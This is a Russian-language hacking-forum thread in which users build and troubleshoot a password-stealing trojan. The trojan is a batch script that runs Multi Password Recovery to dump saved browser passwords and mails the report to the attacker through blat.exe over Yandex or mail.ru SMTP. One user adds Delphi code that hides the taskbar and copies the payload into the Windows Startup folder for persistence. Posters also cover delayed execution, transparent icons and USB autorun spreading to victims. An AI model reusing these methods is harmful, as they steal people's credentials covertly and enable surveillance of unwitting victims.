Делаем троян с отправкой на почту из Multi Password Recovery

Тема в разделе "Статьи", создана пользователем onthar, 13 дек 2010.

  1. relax
    relax Guest
    а че у меня тока от оперы пароли видит? я на видяхи видел google chrome хроме был, у меня и гугл есть но пароли от него он не видет(
     
    2 мар 2011
  2. piro1
    piro1 Новичок
    Симпатии:
    3
    Возможно,что обновлённый Хром у тебя,а на видео нет!
     
    2 мар 2011
  3. onthar
    onthar Продвинутый
    Симпатии:
    224
    каким образом?
     
    2 мар 2011
  4. TrambleR
    TrambleR Guest
    можно упаковать mpr.exe в upx и размер в два раза меньше будет =))
     
    2 мар 2011
  5. onthar
    onthar Продвинутый
    Симпатии:
    224
    TrambleR,
    bat to exe converter сам жмет upx'ом.
     
    3 мар 2011
  6. relax
    relax Guest
    а от мозилы он тоже не видит да?
     
    3 мар 2011
  7. onthar
    onthar Продвинутый
    Симпатии:
    224
    видит.
     
    3 мар 2011
  8. devil-sergei666
    devil-sergei666 Новичок
    Симпатии:
    0
    я вот жду обнову ,чтобы он читал майл ру агент 5.7 ....

    вопрос , насчёт флешки , всё получается ,но как указать путь если mpr.exe будет лежать не в корне ,а в какой нить папке? (пробовал как мог,неполучилось) ну и ещё было бы хорошо изменить сохранение отчёта не в корень а в папку и изменить название отчёта ,можно это сделать?

    и как можно чтоб параллельно с запуском троянца флешка открывалась.? а то ламер будет жать по сто раз на флешку , а там авторан будет запускать троянца , и не сможет зайти на флешку
     
    Последнее редактирование: 3 мар 2011
    3 мар 2011
  9. relax
    relax Guest
    а у меня не видит, у меня в браузерах только опера показана, из за чего так не знаеш? хотя у меня на мозиле паролей больше сохранено
     
    4 мар 2011
  10. adama
    adama Новичок
    Симпатии:
    2
    На другом сайте вчера уже видел этот способ продающийся за деньги, по 200р. за трой... Схема по-детски проста, Вы через аську связываетесь, обозначаете пароль и логин к Вашему мылу и Великий комбинатор собирает для Вас под вас вашего троя! Куча багодарных блин... Спросил его как давно он до этого додумался... сегодня смотрю ни его ни поста, ни этой темы нет. Вот такие пироги.
     
    Последнее редактирование: 16 мар 2011
    6 мар 2011
  11. adama
    adama Новичок
    Симпатии:
    2
    Решил дополнить возможностью скрывать таск-бар на момент выполнения работы сбора и отправки, посредством Delphi, для чего написал сие здесь, да бы поделиться! Фома прозрачна.

    Может кому понадобится!
    Код:
    USES
     SHELLAPI;
    
      {$REGION '  ОСНОВНАЯ ЧАСТЬ  '}
    procedure TForm1.FormCreate(Sender: TObject);
     var
       hTaskBar : THandle;
       OpStruc: TSHFileOpStruct;
       frombuf,buff, tobuf: Array [0..128] of Char; { [0..$FF] }
    begin
    // ОБЕСВЕЧИВАЕМ ФОРМУ
    Form1.Color:=clWhite;
    Form1.TransparentColorValue:=clWhite;
    Form1.TransparentColor:=true;
    // END
    // НАЧАЛО ОТСЕЧКИ ТАЙМЕРА
    opentime:= time;
    // ЗАДАЕМ ОКОНЧАНИЕ ОТСЕЧКИ
    closetime:= opentime+strtotime('00:00:12');
    // ЗАКРЫВАЕМ ТАКСК-БАР
    hTaskbar := FindWindow('Shell_TrayWnd', Nil);
    ShowWindow(hTaskBar, SW_HIDE);
    { Здесь, - Возможное размещение кода под автозагрузку }
    end; // END FormProcedure
                                                     {$ENDREGION}
    
    procedure TForm1.Timer1Timer(Sender: TObject);
     var
       hTaskBar : THandle;
    begin
    if time > closetime then      // В СЛУЧАЕ ОКОНЧАНИЯ, -
    begin // ОТКРЫВАЕМ ТАСК-БАР,ЗАКРЫВАЕМ ОКНО, ВЫХОДИМ
     hTaskbar := FindWindow('Shell_TrayWnd', Nil);
      ShowWindow(hTaskBar, SW_SHOWNORMAL);
    close;
        end;
          end;
     END.
    Время отсечки можете поменять на свое.
    Готовый exe-шник здесь: http://navyforce.ru/doc/Hide.exe
    Прозрачная иконка, что рекомендую:http://navyforce.ru/doc/hide.ico

    Достаточно прописать в основном коде батника, добавив (start Hide.exe).
    Я дописываю между строчками:
    blat.exe -install -server smtp.yandex.ru -port 587 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
    start Hide.exe
    mpr.exe /export


    Кроме того, если надо отследить мне кого с пристастием, я отправляю нашу коняжку в автозагрузку, каждый раз получая по мере регистрации где-либо жертвы в сети, - новые отчеты с его компа, ну и конечно отслеживается по средством почты, как только и когда он садится за комп! Для этого в том же батнике дописываю время задержки срабатывания троя таким образом, -
    Код:
    ping 127.0.0.1 -n 30 >nul
    Способов очень много, я применил этот, красота в простоте! :) Выставил задержку на 30 сек., дабы дать системе пользователя полностью вгрузиться, прокашлаться, даже включить защиту. Пусть будет всё как положено!

    Для размещения коня в автозагрузку,например в случае Windows7 или Vista, создайте нового с заданным временем отсечки после старта винды у пользователя. На моем примере конь называется, Profile.exe, он же указан в коде программы на исполнение копирования, что я назвал - Hide.exe, так как прожка скрывает таск-бар на момент исполнения в данный момент и отсылает нового конька с задержкой в автозагрузку.
    Это прописываете к коду выше основной его части перед end; // END FormProcedure
    Код:
    begin
     // КОПИРОВАНИЕ В СЛУЧАЕ WINDOWS7 OR VISTA
     FillChar( frombuf, Sizeof(frombuf), 0 );
     FillChar( tobuf, Sizeof(tobuf), 0 );
     StrPCopy( frombuf, 'Profile.exe' );
     StrPCopy( tobuf, 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup');
     With OpStruc DO Begin
      wFunc:= FO_COPY;
      pFrom:= @frombuf;
      pTo:=@tobuf;
      fFlags:= FOF_NOCONFIRMATION or FOF_RENAMEONCOLLISION;// Программу не отменить пока не закончит выполнение!
      fAnyOperationsAborted:= False;
      hNameMappings:= Nil;
      lpszProgressTitle:= Nil;
     end;
     ShFileOperation( OpStruc );
     end;  // END COPY
    НЕ забудьте положить в папку include перед компиляцией нового автозагрузочного коня Profile.exe ну и новый Hide.exe, прописав в батнике на исполнение, start Hide.exe как в обычном (верхнем)случае, для скрытия таск-бара!
    В общем то, если видоизменить код, Вы понимаете, до кучи, можно собирать методом COPY нужные файлы, например как файлы различных браузеров их позиции, - и отправлять к нам на почту, как и pass.mpf, причем, их отправка абсолютно не заметна для жертвы! Но для этого Вам достаточно имена этих файлов прописать в основном батнике, также как и
    Код:
    blat.exe -body PassReg -to LOGIN@yandex.ru -attach pass.mpf
    Готов также рассмотреть варианты! Вместе можно многое! Всех благ!
     
    Последнее редактирование: 18 мар 2011
    16 мар 2011
    1 человеку нравится это.
  12. shtabs
    shtabs Новичок
    Симпатии:
    0
    доброе время суток..у меня вопрос: всё делаю по видео,тока почту другую указал(в моем случае @qip.ru) порт на другой поменял т.к. изначально в батнике который имеется не вышло,антивирусник отключил, фаер отсутствует отчет не приходит..
     
    22 мар 2011
  13. onthar
    onthar Продвинутый
    Симпатии:
    224
    shtabs,
    пользуйтесь исходящими серверами мэйл.ру, яндекс.ру, или обращайтесь в поддержку квипа с запросом "настройка почтового клиента"
     
    22 мар 2011
  14. shtabs
    shtabs Новичок
    Симпатии:
    0
    спасибо, пришел отчет Pass reg вот тока без pass.mpf( пользовалься mail.ru и яндекс аналогичная тема)
     
    Последнее редактирование: 22 мар 2011
    22 мар 2011
  15. onthar
    onthar Продвинутый
    Симпатии:
    224
    shtabs, значит где-то ошибка, или запускалось на семерке с включенным UAC.
     
    22 мар 2011
  16. shtabs
    shtabs Новичок
    Симпатии:
    0
    onthar,тока xp cп3..пробую на себе..
     
    22 мар 2011
  17. maks999000
    maks999000 Новичок
    Симпатии:
    0
    Все отлично робит автору респект, а вот с автораном ничего не выходит может есть у кого идейки получше?
     
    22 мар 2011
  18. adama
    adama Новичок
    Симпатии:
    2
    На чем проблема , maks999000?! На каком этапе?
    Давай разберем!... Помогу.

    Я тут одну мысль выскажу, но решать Вам, по-сути, если в самом начале подменить иконку файла MPR.exe, того что с желтым ключиком, того что лежит в папочке (include) на прозрачную, то, - при срабатывании проги и так практически ничего не видно. Просто выскакивает прозрачная хренька, и что это и как, - в голову никому не придет, а если и да, то поздняк метаться! Лично я для подмены ресурсов в таких случаях юзаю ResHacker. Просто и быстро.
     
    Последнее редактирование: 22 мар 2011
    22 мар 2011
  19. Дмитр
    Дмитр Новичок
    Симпатии:
    4
    Я правильно понимаю , что файл взятый отсюда http://navyforce.rоu/doc/Hide.exe

    пропишет файл сконвертированный из батника в автозагрузку компа если , скмпилированный батник называется profile.exe и винда на компе vista или win7?
     
    24 мар 2011
  20. Дмитр
    Дмитр Новичок
    Симпатии:
    4
    Спасибо большое за подробную опись действий , я примерно так и предполагал:happy:

    p.s.
    а сам код на дельфи написан?
    я просто еще начинающий писатель .
     
    25 мар 2011
Загрузка...